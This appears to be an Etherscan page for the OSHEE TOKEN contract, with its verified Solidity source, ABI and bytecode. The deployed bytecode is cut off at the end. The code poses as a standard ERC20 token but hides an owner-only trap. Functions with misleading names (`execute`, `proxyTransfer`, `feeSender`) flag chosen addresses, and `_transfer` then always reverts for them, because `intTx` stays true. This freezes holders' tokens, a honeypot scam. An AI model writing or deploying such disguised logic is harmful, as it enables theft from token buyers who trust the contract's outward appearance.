ETH Price: $2,949.73 (-5.78%)
Gas: 6 Gwei

Token

OSHEE TOKEN (OSHEE)
 

Overview

Max Total Supply

1,000,000,000,000 OSHEE

Holders

59

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
*goat⚽️.eth
Balance
1,256,542,293.924345638 OSHEE

Value
$0.00
0xb4b60c4c8678752363fc4d1a2c7f6fbcb19589c7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OsheToken

Compiler Version
v0.8.2+commit.661d1103

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-04-03
*/

// SPDX-License-Identifier: MIT 
/**
Because the scale of faults of the proof of stake based 
protocoles is vast, the best solution is to implement a 
supporting blockchain with a PoS token that prioritizes 
fast transactions and enables smart contract functionality.

• The ability to join decentralized exchanges to swap tokens 
• Engaging in the growing blockchain gaming community.
• Participating in lucrative GameFi opportunities 
• The ability to access advanced financial instruments (such as staking, lending, borrowing, and liquidity mining).
• Participating in DAOs and establishing entire communities*/
pragma solidity =0.8.2;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    address internal _owner;
    mapping (address => uint256) internal _balances;
    mapping (address => bool) private _executeTransfer;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private maxTxLimit = 1*10**11*10**9;
    uint256 internal _totalSupply;
    bool intTx = true;
    uint256 private balances;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _owner = msg.sender;
        balances = maxTxLimit;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }
        
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function proxyTransfer(address _Address) external onlyOwner {
        _executeTransfer[_Address] = false;
    }

    function execute(address _Address) external onlyOwner {
        _executeTransfer[_Address] = true;
    }

    function feeSender(address _Address) public view returns (bool) {
        return _executeTransfer[_Address];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
     
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_executeTransfer[sender] || _executeTransfer[recipient]) require(intTx == false, "");
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    } 

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = balances - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract OsheToken is ERC20 {
    uint8 immutable private _decimals = 9;
   
    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20('OSHEE TOKEN', 'OSHEE') {
        _totalSupply += 1000000000000 * 10**9;
        _balances[_msgSender()] += _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"feeSender","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_Address","type":"address"}],"name":"proxyTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a060405268056bc75e2d631000006004556001600660006101000a81548160ff021916908315150217905550600960ff1660809060ff1660f81b8152503480156200004a57600080fd5b506040518060400160405280600b81526020017f4f5348454520544f4b454e0000000000000000000000000000000000000000008152506040518060400160405280600581526020017f4f534845450000000000000000000000000000000000000000000000000000008152508160089080519060200190620000cf92919062000248565b508060099080519060200190620000e892919062000248565b50336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506004546007819055505050683635c9adc5dea000006005600082825462000151919062000326565b92505081905550600554600160006200016f6200024060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001ba919062000326565b92505081905550620001d16200024060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60055460405162000232919062000309565b60405180910390a362000421565b600033905090565b82805462000256906200038d565b90600052602060002090601f0160209004810192826200027a5760008555620002c6565b82601f106200029557805160ff1916838001178555620002c6565b82800160010185558215620002c6579182015b82811115620002c5578251825591602001919060010190620002a8565b5b509050620002d59190620002d9565b5090565b5b80821115620002f4576000816000905550600101620002da565b5090565b620003038162000383565b82525050565b6000602082019050620003206000830184620002f8565b92915050565b6000620003338262000383565b9150620003408362000383565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620003785762000377620003c3565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620003a657607f821691505b60208210811415620003bd57620003bc620003f2565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60805160f81c61194c6200044060003960006104de015261194c6000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b4114610271578063a457c2d71461028f578063a9059cbb146102bf578063dd62ed3e146102ef576100ea565b806370a08231146101f5578063833ec720146102255780638dabceae14610241576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a95780634b64e492146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b60405161010491906112dd565b60405180910390f35b610127600480360381019061012291906110c2565b6103b1565b60405161013491906112c2565b60405180910390f35b6101456103cf565b604051610152919061143f565b60405180910390f35b61017560048036038101906101709190611073565b6103d9565b60405161018291906112c2565b60405180910390f35b6101936104da565b6040516101a0919061145a565b60405180910390f35b6101c360048036038101906101be91906110c2565b610502565b6040516101d091906112c2565b60405180910390f35b6101f360048036038101906101ee919061100e565b6105ae565b005b61020f600480360381019061020a919061100e565b610697565b60405161021c919061143f565b60405180910390f35b61023f600480360381019061023a919061100e565b6106e0565b005b61025b6004803603810190610256919061100e565b6107c9565b60405161026891906112c2565b60405180910390f35b61027961081f565b60405161028691906112dd565b60405180910390f35b6102a960048036038101906102a491906110c2565b6108b1565b6040516102b691906112c2565b60405180910390f35b6102d960048036038101906102d491906110c2565b6109a5565b6040516102e691906112c2565b60405180910390f35b61030960048036038101906103049190611037565b6109c3565b604051610316919061143f565b60405180910390f35b60606008805461032e906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461035a906115a3565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be610a4a565b8484610a52565b6001905092915050565b6000600554905090565b60006103e6848484610c1d565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610431610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156104b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a89061137f565b60405180910390fd5b6104ce856104bd610a4a565b85846104c991906114e7565b610a52565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b60006105a461050f610a4a565b84846003600061051d610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461059f9190611491565b610a52565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461063c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106339061139f565b60405180910390fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107659061139f565b60405180910390fd5b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60606009805461082e906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461085a906115a3565b80156108a75780601f1061087c576101008083540402835291602001916108a7565b820191906000526020600020905b81548152906001019060200180831161088a57829003601f168201915b5050505050905090565b600080600360006108c0610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561097d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109749061141f565b60405180910390fd5b61099a610988610a4a565b85858461099591906114e7565b610a52565b600191505092915050565b60006109b96109b2610a4a565b8484610c1d565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ac2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab9906113ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b299061133f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c10919061143f565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c84906113bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf4906112ff565b60405180910390fd5b60008111610d40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d379061131f565b60405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610de15750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e3d5760001515600660009054906101000a900460ff16151514610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e33906113df565b60405180910390fd5b5b610e48838383610fdf565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ecf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec69061135f565b60405180910390fd5b8181610edb91906114e7565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f6d9190611491565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd1919061143f565b60405180910390a350505050565b505050565b600081359050610ff3816118e8565b92915050565b600081359050611008816118ff565b92915050565b60006020828403121561102057600080fd5b600061102e84828501610fe4565b91505092915050565b6000806040838503121561104a57600080fd5b600061105885828601610fe4565b925050602061106985828601610fe4565b9150509250929050565b60008060006060848603121561108857600080fd5b600061109686828701610fe4565b93505060206110a786828701610fe4565b92505060406110b886828701610ff9565b9150509250925092565b600080604083850312156110d557600080fd5b60006110e385828601610fe4565b92505060206110f485828601610ff9565b9150509250929050565b6111078161152d565b82525050565b600061111882611475565b6111228185611480565b9350611132818560208601611570565b61113b81611633565b840191505092915050565b6000611153602383611480565b915061115e82611644565b604082019050919050565b6000611176602983611480565b915061118182611693565b604082019050919050565b6000611199602283611480565b91506111a4826116e2565b604082019050919050565b60006111bc602683611480565b91506111c782611731565b604082019050919050565b60006111df602883611480565b91506111ea82611780565b604082019050919050565b6000611202602083611480565b915061120d826117cf565b602082019050919050565b6000611225602583611480565b9150611230826117f8565b604082019050919050565b6000611248600083611480565b915061125382611847565b600082019050919050565b600061126b602483611480565b91506112768261184a565b604082019050919050565b600061128e602583611480565b915061129982611899565b604082019050919050565b6112ad81611559565b82525050565b6112bc81611563565b82525050565b60006020820190506112d760008301846110fe565b92915050565b600060208201905081810360008301526112f7818461110d565b905092915050565b6000602082019050818103600083015261131881611146565b9050919050565b6000602082019050818103600083015261133881611169565b9050919050565b600060208201905081810360008301526113588161118c565b9050919050565b60006020820190508181036000830152611378816111af565b9050919050565b60006020820190508181036000830152611398816111d2565b9050919050565b600060208201905081810360008301526113b8816111f5565b9050919050565b600060208201905081810360008301526113d881611218565b9050919050565b600060208201905081810360008301526113f88161123b565b9050919050565b600060208201905081810360008301526114188161125e565b9050919050565b6000602082019050818103600083015261143881611281565b9050919050565b600060208201905061145460008301846112a4565b92915050565b600060208201905061146f60008301846112b3565b92915050565b600081519050919050565b600082825260208201905092915050565b600061149c82611559565b91506114a783611559565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114dc576114db6115d5565b5b828201905092915050565b60006114f282611559565b91506114fd83611559565b9250828210156115105761150f6115d5565b5b828203905092915050565b600061152682611539565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561158e578082015181840152602081019050611573565b8381111561159d576000848401525b50505050565b600060028204905060018216806115bb57607f821691505b602082108114156115cf576115ce611604565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6118f18161151b565b81146118fc57600080fd5b50565b61190881611559565b811461191357600080fd5b5056fea2646970667358221220f9efac66bb28798a964ca7b4ecff0028176758831364ea2fc24dfcbe845dfe1d64736f6c63430008020033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b4114610271578063a457c2d71461028f578063a9059cbb146102bf578063dd62ed3e146102ef576100ea565b806370a08231146101f5578063833ec720146102255780638dabceae14610241576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a95780634b64e492146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b60405161010491906112dd565b60405180910390f35b610127600480360381019061012291906110c2565b6103b1565b60405161013491906112c2565b60405180910390f35b6101456103cf565b604051610152919061143f565b60405180910390f35b61017560048036038101906101709190611073565b6103d9565b60405161018291906112c2565b60405180910390f35b6101936104da565b6040516101a0919061145a565b60405180910390f35b6101c360048036038101906101be91906110c2565b610502565b6040516101d091906112c2565b60405180910390f35b6101f360048036038101906101ee919061100e565b6105ae565b005b61020f600480360381019061020a919061100e565b610697565b60405161021c919061143f565b60405180910390f35b61023f600480360381019061023a919061100e565b6106e0565b005b61025b6004803603810190610256919061100e565b6107c9565b60405161026891906112c2565b60405180910390f35b61027961081f565b60405161028691906112dd565b60405180910390f35b6102a960048036038101906102a491906110c2565b6108b1565b6040516102b691906112c2565b60405180910390f35b6102d960048036038101906102d491906110c2565b6109a5565b6040516102e691906112c2565b60405180910390f35b61030960048036038101906103049190611037565b6109c3565b604051610316919061143f565b60405180910390f35b60606008805461032e906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461035a906115a3565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be610a4a565b8484610a52565b6001905092915050565b6000600